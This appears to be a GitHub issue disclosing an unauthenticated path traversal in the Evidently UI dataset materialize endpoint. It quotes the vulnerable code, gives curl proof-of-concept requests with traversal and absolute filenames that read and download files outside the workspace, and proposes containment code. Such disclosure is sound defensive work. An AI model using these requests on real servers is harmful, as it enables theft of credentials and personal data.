Unauthenticated path traversal arbitrary file read in Evidently UI dataset materialization

## Summary

The Evidently UI service exposes a dataset "materialize from source" endpoint that accepts a fully attacker-controlled `filename` and passes it, without any containment check, into the local blob storage which reads it with `posixpath.join(base_path, filename)`. Because `posixpath.join` honors both `../` segments and absolute paths, an attacker can read any `.csv` or `.parquet` file on the host filesystem (outside the workspace directory) and then download its contents through the dataset download endpoint.

In the default configuration (`evidently ui`, started without a secret), the service runs with `NoSecurityComponent`, so every endpoint is unauthenticated. The result is unauthenticated arbitrary file read over the network.

## Affected Versions

Confirmed on v0.7.21 (latest release). The vulnerable code path is present in the `evidently.ui.service` package.

## Details

The endpoint `POST /api/datasets/materialize` (`src/evidently/ui/service/api/datasets.py`) builds a data source from the request body and materializes it:

```python
@post("/materialize")
async def materialize_from_source(
    data: MaterializeDatasetRequest,
    dataset_manager: ...,
    user_id: UserID,
    project_id: ProjectID,
) -> MaterializeDatasetResponse:
    df = await data.source.to_data_source(user_id=user_id, project_id=project_id).materialize(dataset_manager)
    dataset = await dataset_manager.upload_dataset(...)  # stores df as a new dataset you can download
    return MaterializeDatasetResponse(dataset_id=dataset.id)
```

When the source is a `FileDataSource` (`src/evidently/ui/service/datasets/data_source.py`), `filename` is taken verbatim from the request:

```python
class FileDataSource(SortedFilteredDataSource):
    project_id: ProjectID
    filename: str
    is_tmp: bool = False

    def read(self, storage):
        df = FileIO(storage).read_file_from_storage(self.project_id, self.filename)
        return df
```

`FileIO.read_file_from_storage` (`src/evidently/ui/service/datasets/file_io.py`) only validates the file extension, then reads the path as a blob id:

```python
def read_file_from_storage(self, project_id, file_id):
    _, file_extension = os.path.splitext(file_id)
    if file_extension not in self.ALLOWED_FILE_READERS.keys():  # .csv / .parquet only
        raise HTTPException(status_code=400, detail="Extension not allowed")
    file_content = self.file_storage.get_dataset(file_id)   # file_id == attacker filename
    ...
```

`DatasetFileStorage.get_dataset(blob_id)` -> `BlobStorage.get_blob_data(blob_id)` -> `FSSpecBlobStorage.open_blob` -> `FSLocation.open` (`src/evidently/ui/service/storage/fslocation.py`):

```python
@contextlib.contextmanager
def open(self, path: str, mode="r"):
    with self.fs.open(posixpath.join(self.path, path), mode) as f:
        yield f
```

There is no normalization or base-directory containment. `posixpath.join("workspace", "../../../../etc/x.csv")` escapes the workspace, and `posixpath.join("workspace", "/tmp/x.csv")` discards the base entirely and reads the absolute path.

The materialized rows are then stored as a normal dataset and can be retrieved verbatim through the unauthenticated read routes `GET /api/datasets/{id}/download` and `GET /api/datasets/{id}`.

The only restriction is the extension allowlist (`.csv`, `.parquet`). These formats commonly contain database dumps, credential exports, model training data, and PII on the same host.

## Proof of Concept

Prerequisites:
- `pip install evidently==0.7.21`
- A sensitive `.csv` file existing outside the workspace, simulating any data export / credential file on the host.

Steps:

1. Create a sensitive file outside the workspace:

```
printf 'secret_col,value\nADMIN_DB_PASSWORD,hunter2_supersecret\n' > /tmp/secret_outside.csv
```

2. Start the Evidently UI with its default configuration (no secret = no authentication):

```
mkdir -p /tmp/ev_run/workspace
cd /tmp/ev_run
python -c "from evidently.ui.service.app import run_local; run_local(host='127.0.0.1', port=8011, workspace='/tmp/ev_run/workspace')"
```

3. Create a project (unauthenticated):

```
curl -s -X POST http://127.0.0.1:8011/api/projects \
  -H 'Content-Type: application/json' \
  -d '{"name":"poc","description":"x"}'
```

Output:

```
"019ecac5-bf25-7a67-85ab-b2071b844ca1"
```

4. Materialize a dataset from a traversal filename (PROJECT_ID from step 3):

```
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{
        "name": "stolen",
        "source": {
          "type": "evidently:data_source_dto:FileDataSourceDTO",
          "filename": "../../../../../../tmp/secret_outside.csv"
        }
      }'
```

Output:

```
{"dataset_id":"019ecac6-2ade-776e-bf50-a6ae18a25521"}
```

5. Download the stolen file contents:

```
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-2ade-776e-bf50-a6ae18a25521/download?format=csv"
```

Output (contents of `/tmp/secret_outside.csv`, which lives outside the workspace):

```
secret_col,value
ADMIN_DB_PASSWORD,hunter2_supersecret
```

An absolute path works identically (the join discards the workspace base):

```
printf 'k,v\nABSOLUTE_READ,works\n' > /tmp/abs_secret.csv
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{"name":"abs","source":{"type":"evidently:data_source_dto:FileDataSourceDTO","filename":"/tmp/abs_secret.csv"}}'
# -> {"dataset_id":"019ecac6-686e-7e6d-9afe-23697614e585"}
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-686e-7e6d-9afe-23697614e585/download?format=csv"
# -> k,v
#    ABSOLUTE_READ,works
```

## Impact

An unauthenticated remote attacker (or, when a token is configured, any authenticated user) can read arbitrary `.csv` and `.parquet` files anywhere on the server filesystem and exfiltrate their full contents. This discloses database exports, credential/secret files, training datasets, and other tenant data stored on the host, regardless of the project the attacker can access.

## Suggested Remediation

Resolve and contain the requested path before opening it. For example, in `FSLocation.open` (and the other path-taking methods) reject absolute paths and normalize/verify the result stays under `self.path`:

```python
def _safe(self, path: str) -> str:
    full = posixpath.normpath(posixpath.join(self.path, path))
    base = posixpath.normpath(self.path)
    if full != base and not full.startswith(base + posixpath.sep):
        raise PermissionError("path escapes storage root")
    return full
```

Additionally, in `read_file_from_storage` / `FileDataSource`, validate that `filename` contains no path separators or `..` segments, and resolve dataset files only by their stored blob id rather than a client-supplied path.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Unauthenticated path traversal arbitrary file read in Evidently UI dataset materialization #1887

Summary

Affected Versions

Details

Proof of Concept

Impact

Suggested Remediation

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Unauthenticated path traversal arbitrary file read in Evidently UI dataset materialization #1887

Description

Summary

Affected Versions

Details

Proof of Concept

Impact

Suggested Remediation

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions